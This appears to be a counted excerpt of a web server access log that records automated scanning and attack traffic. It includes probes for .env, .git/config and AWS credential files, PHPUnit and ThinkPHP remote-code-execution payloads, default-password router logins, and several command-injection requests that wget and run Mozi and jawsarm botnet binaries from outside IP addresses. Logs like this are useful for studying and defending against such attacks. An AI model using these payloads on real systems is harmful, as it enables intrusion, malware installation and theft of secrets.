48	4	GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
49	4	GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
50	4	GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
51	4	GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
52	4	GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
53	4	GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1
54	4	GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
55	4	GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
56	4	GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
57	4	GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
58	4	GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
59	4	GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
60	4	GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
61	4	GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
62	4	GET /actuator/gateway/routes HTTP/1.1
63	3	GET /devops/.git/config HTTP/1.1
64	3	GET /_ignition/execute-solution HTTP/1.1
65	3	GET /console/ HTTP/1.1
66	3	GET /.env.secret HTTP/1.1
67	3	GET /staging_area/.git/config HTTP/1.1
68	3	GET /public/.git/config HTTP/1.1
69	3	GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.189.31.150/jawsarm;chmod+777+/tmp/jawsarm;sh+/tmp/jawsarm HTTP/1.1
70	3	GET /configuration/.env HTTP/1.1
71	3	GET /core/.git/config HTTP/1.1
72	2	POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
73	2	GET /user/.git/config HTTP/1.1
74	2	GET /.env.stage HTTP/1.1
75	2	GET /Media/Images/1801359D.PNG HTTP/1.1
76	2	GET /Media/Images/BF8AD73A.PNG HTTP/1.1
77	2	GET /api/.git/config HTTP/1.1
78	2	GET /geoserver HTTP/1.1
79	2	GET /.env.backup HTTP/1.1
80	2	GET /solr/admin/info/system?wt=json HTTP/1.1
81	2	GET /Media/Images/F81B47A3.PNG HTTP/1.1
82	2	GET /Media/Images/54FA37E3.PNG HTTP/1.1
83	2	POST /Autodiscover/Autodiscover.xml HTTP/1.1
84	2	GET /Module1/js/Home_9b5766a815f5416da1d14b6622620932.js HTTP/1.1
85	2	GET /.env.dev HTTP/1.1
86	2	GET /xmldata?item=all HTTP/1.1
87	2	GET /user_panel/.git/config HTTP/1.1
88	2	GET /build/.env HTTP/1.1
89	2	GET /login.cgi?username=telecomadmin&psd=telecomadmin HTTP/1.1
90	2	GET /login.cgi?username=admin&psd=1234 HTTP/1.1
91	2	GET /login.cgi?username=awnfibre&psd=fibre@dm!n HTTP/1.1
92	2	GET /.env.uat HTTP/1.1
93	2	GET /.env.default HTTP/1.1
94	2	GET /login.cgi?username=admin&psd=admin HTTP/1.1
95	2	GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
96	2	\x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00
97	2	GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
98	2	GET /.env.test HTTP/1.1
99	2	GET /.env.production.local HTTP/1.1
100	2	GET /.env.live HTTP/1.1
101	2	GET /client/.git/config HTTP/1.1
102	2	GET /app/resources/.git/config HTTP/1.1
103	2	GET /.env.testing.local HTTP/1.1
104	2	GET /.env.local HTTP/1.1
105	2	GET /settings/.env HTTP/1.1
106	2	GET /js/mainControllers.js HTTP/1.1
107	2	GET /js/mainControllersUtils.js HTTP/1.1
108	2	GET /js/bootstrap.min.js HTTP/1.1
109	2	GET /js/moment.min.js HTTP/1.1
110	2	GET /.env.staging.local HTTP/1.1
111	2	GET /phpmyadmin/index.php HTTP/1.1
112	2	GET /1.php HTTP/1.1
113	2	GET /systembc/password.php HTTP/1.1
114	2	GET /files/.git/config HTTP/1.1
115	2	GET /src/.git/config HTTP/1.1
116	2	GET /www/.git/config HTTP/1.1
117	2	GET /project/.git/config HTTP/1.1
118	2	GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
119	2	GET /.env.production HTTP/1.1
120	2	GET /data/.git/config HTTP/1.1
121	2	GET /prod/.env HTTP/1.1
122	2	GET /.env.sandbox HTTP/1.1
123	2	GET /config.json HTTP/1.1
124	2	GET /.env.template HTTP/1.1
125	2	GET /geoip/ HTTP/1.1
126	2	GET /password.php HTTP/1.1
127	2	GET /config/.env HTTP/1.1
128	2	GET /users/users/login HTTP/1.1
129	2	GET /t4 HTTP/1.1
130	2	GET /socket.io/socket.io.js HTTP/1.1
131	2	GET /js/jquery.min.js HTTP/1.1
132	2	GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
133	2	GET /js/jquery.mask.min.js HTTP/1.1
134	2	GET /users/users/users/login HTTP/1.1
135	2	GET /users/login HTTP/1.1
136	2	GET /form.html HTTP/1.1
137	2	GET /robots.txt HTTP/1.1
138	2	GET /upl.php HTTP/1.1
139	2	GET /libs/js/iframe.js HTTP/1.0
140	1	GET /css/rcError.css HTTP/1.1
141	1	GET /css/elementsDesktop.css HTTP/1.1
142	1	GET /.env.init HTTP/1.1
143	1	GET /test/.git/config HTTP/1.1
144	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xA1\xDE\x8C
145	1	GET /Fonts/VeraBd.woff HTTP/1.1
146	1	GET /sellers.json HTTP/1.1
147	1	GET /css/fonts.css HTTP/1.1
148	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xB6z/\x03\xFDX\x80\xD4(\xD5\xE9\xF1\xA6\xE3\x9D\x1A\x00Xpd\xA6Bz\xA0Z\x7F\xC5b\xA6Nx8 \x93\xFB\x8B\x91>]\xEA
149	1	HEAD / HTTP/1.1
150	1	GET /css/bootstrap.min.css HTTP/1.1
151	1	GET /css/ui.jqgrid.min.css HTTP/1.1
152	1	GET /app-ads.txt HTTP/1.1
153	1	GET /css/jquery-ui.css HTTP/1.1
154	1	GET /css/style.css HTTP/1.1
155	1	GET /ads.txt HTTP/1.1
156	1	GET /v3/.git/config HTTP/1.1
157	1	GET /Fonts/Vera.woff HTTP/1.1
158	1	GET /socket.io/1/?t=1740035831699 HTTP/1.1
159	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03s\xCD\xCC\x029\x8C\xDB\x9Dpp>\x88I\x04\x1E$\xDA\xB9E)\xDD*\xE4\xDBS\x5C\xD5vV\xE6\xC4L\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
160	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x07\xB6\xDD\xF7\x91\x90>\xC8\x81w\x93w`\x17b\x81R\x06\xD3vy\xF5\x1A\x1Cb\xF7y\x229\x09\xFE\xAA\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
161	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03o \x7F\x93n\xA8\xC5\xBF\xEBZT\xB4\x16\xD5\xB8\xB6\xE5\xDE\x8F\xC0a\x1F\xDAC\xB1M\x00d\xB8\x8C\xACU \x02L\x07\x15\xCAM)\x8D\xED\x983\xCDq\xA8
162	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x0C\xBC\xED\xA0\xE4\xEEqQ{^,\xA0\xD1\xAC^\xE5\x0E\xED\xDF\xA6\xE6\xAB\xE6\x22\xE1\xAEs\xCD\xB3\xE4Y\xC9\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
163	1	\x00\xAB\x03$\x0F\xFF\xFFinfo
164	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03\xC2\x0B:6\x99\xBB\xEC\xF3\xBE\xC0\xD7%<\x94uH\xC82\xD2\xA4\xCA\x8D\xE9\x00N\xAFz]^f\x1C\xAC\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
165	1	\x08\x00\x86\x01
166	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03D&\xB3\xDB\xB7,\xBC?*\xD3\xF2a\xDF\x1B\xB6\xE0\xC91\xE0&\x93[\xCF\xAE\x1B:\xB9\xBF
167	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03u\xC0\xBF<\xCC\x10:\x8F\xE1`\x03z\xB3=T0\x95-]\xCB\xB1\xA7tA9ek\xDA\x8D\x9FY; \xE3g}R\x99\xB6\xDD\xB3\x98\xBF\x04\x87\xC51\xFE\xDEE\xC4\x9F\xB6fh\xDD>\x83\xCE\xFEa>\xAD\x9A\x82\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
168	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x03\xEEnn’-9a\x02/\x9E)\x84\x14\x14\x1A
169	1	\x16\x03\x03\x01\xA7\x01\x00\x01\xA3\x03\x038L\x12\x80\x9A\xF9\x022\x22\xFF9)\x84?b\x12\xBD\x11!+mO\xE3>\x14?\x1D\x19c\xE6J\x93 7\x99\x22f\x03L\x92:\xC7\xC8\xF4~’\x00GAt1\xCF\xC1\xFF\xD2\x03\xE3v\x91\xD1.\x94\xE2\xA2\xD4\x00\x8A\x00\x16\x003\x00g\xC0\x9E\xC0\xA2\x00\x9E\x009\x00k\xC0\x9F\xC0\xA3\x00\x9F\x00E\x00\xBE\x00\x88\x00\xC4\x00\x9A\xC0\x08\xC0\x09\xC0#\xC0\xAC\xC0\xAE\xC0+\xC0
170	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03z\x1E0\xEC\x00\x1E\xB81hL\x9A\x0Fp\xCBq\xAC\x8E\xDA\xD9f\x920\xA4\xEB
171	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEA%D\x22V\xF4\xE6*\x01P\x16\xDB\xAC
172	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x08j\x98\xD3\xBB\xEE\xFAH\x82
173	1	\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03i \x7F\x18E\x808\xA3;\xF4\xF4\x10\xB8\xA6\xD9\x97\xF4\x11\x9B\xFC\x8C\xCE\xB15\xDD0r\xEE
174	1	GET /data/processing/.git/config HTTP/1.1
175	1	GET /env/.env HTTP/1.1
176	1	GET /dev/backup/.git/config HTTP/1.1
177	1	GET /data/private/.git/config HTTP/1.1
178	1	GET /.env.qa HTTP/1.1
179	1	GET /private/.env HTTP/1.1
180	1	GET /images/.git/config HTTP/1.1
181	1	GET /.envrc HTTP/1.1
182	1	GET /staging/.git/config HTTP/1.1
183	1	GET /build/.git/config HTTP/1.1
184	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03C$hr\xA9\xAEt8\xED+\xA8\x90\x96>\xA4\x1EF<b\xF6\xFB\xC7\x88\xE2\xFC\xDDR-\xF15\x0Bt \xD3<\x14\xD6\xF2\xF68\xF1\xD5d+mQ\xA8\xD1o\xCD\xD1\xB4\x079.x\x88\x5C\xD3Dp9&8\x06\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
185	1	145.ll
186	1	GET /logs/current/.git/config HTTP/1.1
187	1	GET /geoip/geoip.inc HTTP/1.1
188	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03x\xF0\x101\xD4 Dp\xDFD\xA2\x9F\x87\xAE\xE5aC\x14.\xD7\xA7\xF7I\xBC
189	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE0\x5C)\xF7\xF1\xE5\xDAp*[\xB9\xB8\x03\x08\xBD\xEA\xCC\x0B\xD01\x84\x00\xCC\x8D=\x84[\xA3t\x0012\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
190	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xA9\xEF\x8C\xB5)Vi\xDC5\xDC-?-\xB0N\xC7E\xBD\x85nl\x7F\xA3\xFE\xD8\x18\xF2\x19\xF1\x05\xCAe\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
191	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03W\x97A\xA7\x16k\xD9\x17\xB6\xD1\xDF\x8F\x11~EC\xBAX\xFF\xA8^ <\x8C\x95\x09\x960\x1A{\x07\xAC\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
192	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03M\xA2\x13\x0BK\x055\xC8\x954\xE1\xB68rx\x04\x16\x12VC\x12\xED \x81A\xEB\x8C\xDC\x91\x18\xB0W\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
193	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xDA1c\xAC>\xED\x92\xFF\x86\x83\xE6[\x0F\xB3\x12)h\xB2#\x9E\x5C\x87\xDC\xE8\x03\xD2\xE1\x19\x94\x06\xFEm \x90zH\xC9\xF9<\x82z\x81\xCAN\xFB\xB2\x10\xD3\xF9_\xA5\x8B\xA8\x85\x1D\xF5r-\xC2\xBCi\xD0x\x04\x93\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
194	1	GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
195	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xF7\x9D\x00\xEB;:\xC5\xB4\x95%\xAAip\xAF\xF1\xCE\xC0\xB7\xE6\x9B-)\xDB\xE8\xAF\xA84[\xF0\xF1i\xA6\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
196	1	GET /tools/.git/config HTTP/1.1
197	1	\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
198	1	GET /sitemap.xml HTTP/1.1
199	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xFE\xA2\x1D\x17\xD0\xCC2Wjf\x98Fu\xE7\xC0\x1E}xu\xE7a
200	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xE8P\xE86\xAB?RGM\xDF~\x93T\x1BJ8Ij\xA9\xEB\xA2\x8B\xE7$\x00\xB0\xFF\x96\xD6\x823\xB8\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
201	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03(\xA7\x1F\x13
202	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03
203	1	GET /dashboard/.git/config HTTP/1.1
204	1	GET /static/content/.git/config HTTP/1.1
205	1	GET /deploy/.git/config HTTP/1.1
206	1	GET /app/frontend/.git/config HTTP/1.1
207	1	GET /scripts/.git/config HTTP/1.1
208	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xC8\xF72%\xB3\x0F7\x80zyg\xF8\x13\xF9,\xEFKz\xED\xCA\x94\x1E^\x0CZ\xC8evoQ\x88\xED \x16\xC3\xF1]\x01\xE3\xCE\x8C?\xF7G\xB6Yvrg\xFF,\x9CI\x94jq\xE5\x17\xB7\x8D3bM\xC8\xBB\x00&\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
209	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\x87\x97\xE5F
210	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03x\x12\x9EeW\xF5\x10s\xD0\xF6\x90\xB8\x0FB\xDC\x96\xE0O\xBDn\x0E\xA8,\xC2C\xF1X\xDB5j8\x97\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
211	1	\x16\x03\x01\x00\xF2\x01\x00\x00\xEE\x03\x03Ck\xDF2;g\x11U\xD4\x8Fz\x87\x83\x5C\x89\xC4@\x13x\x95\xC0eL\x9D\x14\xEEd\xEF\xE4\x10\x99\xF1 Z\xE0’%4
212	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03N\xF6\xE0b\xCE\xC9((\xE2\xD3\x1Ae\xC2\xEC^[\x14\x96\xA6\x02\xF6Np\x09
213	1	GET /users/users/users/favicon.ico HTTP/1.1
214	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03I\xBB\x88\xEELc\xBE\xC3\xB1\xEB\xD7\x9B\x8CrI%\xAE\xDE\xBF(\x1BQ\xA1\x81\x87\xE9/,\xB4\xDD\x00L\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
215	1	GET http://azenv.net/ HTTP/1.1
216	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03CH\xA9sh\x9A\x00qK\x0B\x9Bnr%[\xBDvKX5\x91\xC9
217	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xC6\x9E
218	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03K\x8D\x90\xDB\xBA\xD6\x80\x09\xA7\x04q}Xa\xE7\xB8\xDA\xD4\xB7\xD3\xA1\xE2\xFEB7j\xEE\xCE\xE5\xBCP\x13 \x0Cqn\xCC\xDB\x1B\x1D`R\xA9\x89\x17\xD6\x1F’\x8F\x22yY\x90\xFF\x19=\x93>-\xC4\x9CRR:\xA1\x00&\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0
219	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\x9A\xC4\x89x*8Q\xFE
220	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x99D\x1B\xB5\x1A\xE2K\xD9\x9C\x87D\x99\x95\x886\xC7\xDF&\x99\x00\xF5Y\xA6\x89\x80>2\xCE\xF8\xB9*y \xA2q\x01\xB2\xCA\xDBf\x14k\xC2\xE89<\xCA\x85_<wP\xB0\xE9\xAF\xBD\xAB\xEDn\x0B:\xA7\xD2i\xA3\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
221	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03 \xAEr]\x09\x19\xA3\x09\xB6\xDE \x8B\x9F\x1D\xFB\xF7\x89?\xE1\xBE\xB7\x82C\xDCE\x1D=\xCD\xFEh`- \xDA`\xB9\xBC\x99\x92\xB4C^,\xAF\x11\xD81\xAC\x8C\xCA$@\xA4b\x82\x03\xE2%\xED\x02\x8A\xB1\x85r\xAB\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0’\xC0
222	1	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://221.15.186.233:58183/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
223	1	GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.27:10529/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
224	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03\xCC\xA8k\xBAW\x09\x07\xDE\x93\x82\x8B\xB6\x9AA\x02W*
225	1	GET /logs/temp/.git/config HTTP/1.1
226	1	GET /tmp/.env HTTP/1.1
227	1	GET /build_tool/.git/config HTTP/1.1
228	1	GET /infra/.git/config HTTP/1.1
229	1	GET /modules/db/.git/config HTTP/1.1
230	1	GET /scripts/dev/.git/config HTTP/1.1
231	1	t3 12.1.2
232	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xAD\x18\x8FS\x16\x88\x16 e\xAB\x13\x88\x8F\xB3I\xEB\xC85@\x17\x8D7\xEA\x8B\x1D\xA3\xA6\xA6~}\xBF\x8F \x12\xCCi\xEE\xEA`.\x13K\x01\x94\xF1fmJ\x0C\xFD\x96\xDA\x8B\x1DY\x15-\x00\xDAT\xF1\x98\x9F\x96\x1D\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0’\xC0
233	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03)\xBF\x17\x7F
234	1	GET //wp-includes/termps.php HTTP/1.1
235	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xEB\xA6\xA5\xEF\xE3\x03\x98K3E\xF0\xD6\xBD
236	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03x/\xD0\x9FU 4\x7F\x14I\x5C\x0B\xC1\x949\xC4*pR\x18\xD8\x84\xA0
237	1	\x00\x0E\x08o\x22=\x06\xEAqV\x0B\x00\x00\x00\x00\x00
238	1	\x00\x0E8o\x22=\x06\xEAqV\x0B\x00\x00\x00\x00\x00
239	1	\x16\x03\x01\x02\x00\x01\x00\x01\xFC\x03\x03\xDA\xBBl\x1AIAgD\xA0J\xAB\xCA\xAC\xDC\xE8\xA5\xD2\x1F\x04\xFB\x8546\x15\xEE\xE1\x044\xD5\xBB\x8C\xCC \x8B\xA5\x1E\xE5U\xC0\xDF\x85\xC2\xA8\xAC\x96n\xBB\x0B\xA4\xD7\xEES\x0F\x9Dh\x87\xA6\xA9\xD6I\xC2\xC2W\xEBM\x00V\x13\x02\x13\x03\x13\x01\xC0,\xC00\xC0+\xC0/\xCC\xA9\xCC\xA8\x00\x9F\x00\x9E\xCC\xAA\xC0\xAF\xC0\xAD\xC0\xAE\xC0\xAC\xC0$\xC0(\xC0#\xC0’\xC0
240	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xAF\xED*m\x88\xAD\x1E\xE3\xE9s{\xD0\x87g\x82\xAC?\x8FJ\xD4\xBB\xF5\xD5s?Hy\xD8\xFCH\x80\xF6\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
241	1	OPTIONS / RTSP/1.0
242	1	OPTIONS / HTTP/1.0
243	1	GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
244	1	\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x034\x06\xFA\xA4,\xD6\xA4%\x0E?\xF5\xCE#E\xDCv\x99\x184\x8692g\x003S\xBFJ\xB9G\xD9\x08\x00\x00h\xCC\x14\xCC\x13\xC0/\xC0+\xC00\xC0,\xC0\x11\xC0\x07\xC0’\xC0#\xC0\x13\xC0\x09\xC0(\xC0$\xC0\x14\xC0
245	1	\x16\x03\x01\x00\xEE\x01\x00\x00\xEA\x03\x03v\xAE\x18\xCC\xECRe\xDE\x8B\x0F\x8C\x03\xDCr\xD6\xAD’\x92#k\xA3\xE3\xE4\x8FV9$!
246	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x9F\xC5_\xEB\xDBo\xD7\xC6\x9A\x17\xB5W\xC0\xD6X\xAD\xD5\xD1\x98X\x09x\xFB\x89S\xC3\x99\xF2*\x1C\xC2\x0E \x8C\x8ES\x85j\xF9\x9C\xAA,5m\xA1{\x90\xB2\xD5E\xB2S\x87\xA1\x071\x0B
247	1	GET //thoms.php HTTP/1.1
248	1	GET //inputs.php HTTP/1.1
249	1	GET //userfuns.php HTTP/1.1
250	1	GET //tempfuns.php HTTP/1.1
251	1	GET //termps.php HTTP/1.1
252	1	GET //wp-content/termps.php HTTP/1.1
253	1	GET //classfuns.php HTTP/1.1
254	1	GET /lib/js/.git/config HTTP/1.1
255	1	GET /lib/python/.git/config HTTP/1.1
256	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03nO\xBF2\xEA\x00\xFBm\x85^\xF8\x85H{\xA9\xF6\xD57Y\xC4\x98NLCM\xB8\xD6\xCE\xBC\x03\x9DH\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
257	1	GET /shell?cd+/tmp;rm+-rf+*;wget+http://121.231.99.27:57203/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
258	1	GET /.env.preprod HTTP/1.1
259	1	GET /.aws/credentials HTTP/1.1
260	1	GET /docker-compose.prod.yml HTTP/1.1
261	1	GET /.env.bak HTTP/1.1
262	1	GET /.env.config HTTP/1.1
263	1	GET /.env.prod HTTP/1.1
264	1	GET /config/.git/config HTTP/1.1
265	1	GET /.env.ci HTTP/1.1
266	1	GET /cms/.git/config HTTP/1.1
267	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x982b=\x14F<\xC0\xF7\xB4\xC2\xF1\x8F\xFA\x16R\x91*\x14\xEF\xD1\x15\xAE{Ng\xDB=&5\xCC`\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
268	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xDA\x84\xA5I\xDACiEO\xE3\x09\x92\x04\x95\x7F\xF4\xE3\x11\xD8\xFD\xD8>\x8B(\xA8\xA9q\x22\xF7\x8Dv3\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
269	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\xCF\xA9 \x82\xCD\xAAQ\x1F\x7F\x04\xED\x0C \x00\xAD\xED\x1BdF\x8E@C\xAF\x8Ek\xD1\xF70\x8C\x01\xCD\xE3\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
270	1	GET /api.json HTTP/1.1
271	1	\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03\xE0\x16~L\xCE!\xF2R\xC7\x04\x1E\x00\xE4\x12Ms^I\x10\x02\x1A\xA3\xA6\xC4%\xA9:9’k\xF2\xCF \xB0\xB8w\xA2\xC8\xBC\xEB5%H)\xDCc6W\xF4p\xF6\xE7y\x8D\x98\xCB\xEA\x8E#\x91\xAD\xB5\xF0\xCBj\x004\xCC\xA8\xCC\xA9\xC0/\xC00\xC0+\xC0,\xC0\x09\x00\x9E\xCC\xA8\xCC\xAA\x003\x00=\x00\x16\xC0
272	1	\x04\x01\x01\xBBh\x156[\x00
273	1	\x05\x01\x00
274	1	CONNECT ifconfig.co:443 HTTP/1.1
275	1	\x16\x03\x01\x05\xA8\x01\x00\x05\xA4\x03\x03\x91\x9B\xAEB\xFCqx#\xB6VBN\xF1\x10\xF8\x5C)\x9E\x9A\xEBo\xBB\xB2\xA9S\xB5h]\x19b\xAF\xBE \x7F\xF1\xD1\x89\x90\xD8\xCB\xEDa~\x01Pa\xED\xD3\x91\x8E\xAAOB\x08\xF3\xDE\xC9\x0B\xA9T?\xA2r\x96\x93\x00\x1A\xC0+\xC0/\xC0,\xC00\xCC\xA9\xCC\xA8\xC0\x09\xC0\x13\xC0
276	1	GET /Public/home/js/check.js HTTP/1.1
277	1	GET /.env_sample HTTP/1.1
278	1	GET /backup/.git/config HTTP/1.1
279	1	GET /app/.git/config HTTP/1.1
280	1	GET /api/.env HTTP/1.1
281	1	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.215.84.91:51040/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
282	1	GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://39.87.13.136:59404/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
283	1	\x16\x03\x01\x00{\x01\x00\x00w\x03\x03hh:\x85\xB7\x06!cz\xBE)FY\xFAr\xE2N%\xEB\xFF\x02\xF2\x03\xEE\x8E\xEA(\x89\xD5\xDAb\x8C\x00\x00\x1A\xC0/\xC0+\xC0\x11\xC0\x07\xC0\x13\xC0\x09\xC0\x14\xC0
